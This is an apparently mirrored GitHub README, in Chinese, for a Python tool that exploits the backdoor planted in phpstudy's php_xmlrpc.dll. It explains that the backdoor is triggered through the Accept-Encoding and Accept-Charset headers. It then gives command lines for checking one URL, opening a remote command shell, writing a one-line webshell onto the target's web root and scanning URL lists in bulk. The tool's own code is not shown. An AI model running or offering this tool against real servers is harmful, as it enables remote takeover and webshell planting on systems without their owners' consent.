phpstudy后门漏洞利用工具
2019-10-03 06:42:27 Author: github.com(查看原文) 阅读量:570 收藏

Join GitHub today

GitHub is home to over 40 million developers working together to host and review code, manage projects, and build software together.

Sign up

phpstudy(2016/2018) backdoor rce

Python

0x00 概述

20190920 phpstudy爆出存在后门,该软件官网在2016年被入侵,软件安装包(php_xmlrpc.dll)被植入后门,利用http请求头的Accept-Encoding: gzip,deflate和'Accept-Charset'可造成远程代码执行。

本工具支持单url检测,cmdshell,get web shell(写入一句话木马),批量检测。

0x01 需求

python2.7

pip install requests

0x02 快速开始

使用帮助: python phpstudy-backdoor-rce.py -h

单url漏洞检测: python phpstudy-backdoor-rce.py -u "http://www.xxx.com/"

cmdshell: python phpstudy-backdoor-rce.py -u "http://www.xxx.com/" --cmdshell

getshell: python phpstudy-backdoor-rce.py -u "http://www.xxx.com/" --getshell --web-path WWW

批量检测: python phpstudy-backdoor-rce.py -f urls.txt

0x03 反馈

issus

gmail:[email protected]

qq:[email protected]


文章来源: https://github.com/theLSA/phpstudy-backdoor-rce
如有侵权请联系:admin#unsafe.sh